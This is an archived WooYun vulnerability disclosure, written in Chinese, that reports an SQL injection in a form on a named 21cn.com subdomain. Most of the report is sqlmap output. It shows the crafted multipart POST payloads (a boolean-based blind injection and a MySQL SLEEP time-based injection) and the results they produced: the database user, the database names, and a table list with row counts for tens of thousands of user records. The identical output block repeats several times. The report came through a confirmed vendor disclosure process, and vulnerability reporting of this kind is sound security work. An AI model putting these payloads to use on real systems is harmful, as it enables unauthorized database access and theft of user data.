破壳企业应急安全(防御方向)课程 应急响应 勒索病毒 挖矿木马 DDOS 日志分析

世纪龙某处表单存在SQL注射漏洞

编号127189
Urlhttp://www.wooyun.org/bug.php?action=view&id=127189
漏洞状态厂商已经确认
漏洞标题世纪龙某处表单存在SQL注射漏洞
漏洞类型SQL注射漏洞
厂商世纪龙信息网络有限责任公司
白帽子路人甲
提交日期2015-07-16 15:47:00
公开日期2015-08-30 22:54:00
修复时间(not set)
确认时间2015-07-16 00:00:00
Confirm Spend0
漏洞标签Mysql 注射技巧
关注数0
收藏数0
白帽评级
白帽自评rank16
厂商评级
厂商评rank15
漏洞简介
None
漏洞细节

POST /home/preview HTTP/1.1
Content-Length: 946
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_DTQUTVUHKJ
X-Requested-With: XMLHttpRequest
Referer: http://ts.21cn.com/
Cookie: PHPSESSID=06f83672ea38aac0b7e54abeb038a20f; JSESSIONID=aaa9wVJf_6Gee7WcYBv6u
Host: ts.21cn.com
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.0 Safari/537.36
Accept: */*
Content-Type: multipart/form-data; boundary=-----wooyunBoundary_LFUYYLIYJS
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--

POC

sqlmap identified the following injection points with a total of 126 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user: None
current user is DBA: False
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
current user: '[email protected]'
current user is DBA: False
available databases [3]:
[*] information_schema
[*] jutousu
[*] test
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: MULTIPART pmerchantname ((custom) POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND 3901=3901 AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: -------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="parea"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="phtmltopic"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pmerchantname"
a%') AND (SELECT * FROM (SELECT(SLEEP(5)))uFgO) AND ('%'='
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="psex"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pshuqiu"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptitle"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpcid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="ptmpscid"
-------wooyunBoundary_LFUYYLIYJS
Content-Disposition: form-data; name="pxing"
-------wooyunBoundary_LFUYYLIYJS--
---
back-end DBMS: MySQL 5.0.12
Database: jutousu
+--------------------------------+---------+
| Table | Entries |
+--------------------------------+---------+
| iic_user | 82710 |
| iic_reply | 54781 |
| iic_log | 49619 |
| iic_digg | 46570 |
| iic_post_sync | 18118 |
| iic_user_addres | 17637 |
| iic_post | 15565 |
| iic_digg_20131224 | 13041 |
| iic_post_com | 12930 |
| iic_reply_sync | 6894 |
| iic_area | 3407 |
| iic_collective_digg | 2153 |
| iic_case | 941 |
| iic_access | 936 |
| iic_com | 764 |
| iic_wxuser | 750 |
| iic_recom | 731 |
| iic_collective_reply | 672 |
| iic_post_dealwith_satisfaction | 640 |
| iic_captcha | 531 |
| iic_merchant | 472 |
| iic_node | 278 |
| iic_movice | 188 |
| iic_redblackdigg | 100 |
| iic_ipadmin | 99 |
| iic_feedback | 95 |
| iic_collective | 93 |
| iic_postkeyword | 93 |
| iic_cat | 61 |
| iic_reply_link | 60 |
| iic_collectivetimeline | 59 |
| iic_collectivenews | 43 |
| iic_hotpost | 42 |
| iic_team | 42 |
| iic_article | 40 |
| iic_role_account | 36 |
| iic_account | 30 |
| iic_specialcolumn | 27 |
| iic_collectiveslide | 26 |
| iic_proc | 26 |
| iic_redblacklist | 25 |
| iic_keyword | 12 |
| iic_collectiveweibo | 11 |
| iic_admin | 8 |
| iic_role | 6 |
| iic_ip | 4 |
| iic_experttype | 3 |
| iic_arc | 2 |
| iic_wbsync | 2 |
| iic_filter | 1 |
+--------------------------------+---------+

修复方案

修复

状态信息 2015-07-16: 细节已通知厂商并且等待厂商处理中
2015-07-16: 厂商已经确认,细节仅向厂商公开
2015-07-26: 细节向核心白帽子及相关领域专家公开
2015-08-05: 细节向普通白帽子公开
2015-08-15: 细节向实习白帽子公开
2015-08-30: 细节向公众公开
厂商回复感谢您对我们业务安全的关注,根据您的报告,问题已着手处理,谢谢
回应信息危害等级:高漏洞Rank:15 确认时间:2015-07-16 22:53
Showing 1-2 of 2 items.
评论内容评论人点赞数评论时间

对不起,漏洞详情复制的时候复制错了,已联系乌云修改。

紫霞仙子02015-07-24 12:22:00

对不起,漏洞详情复制的时候复制错了,已联系乌云修复。

紫霞仙子02015-07-24 12:21:00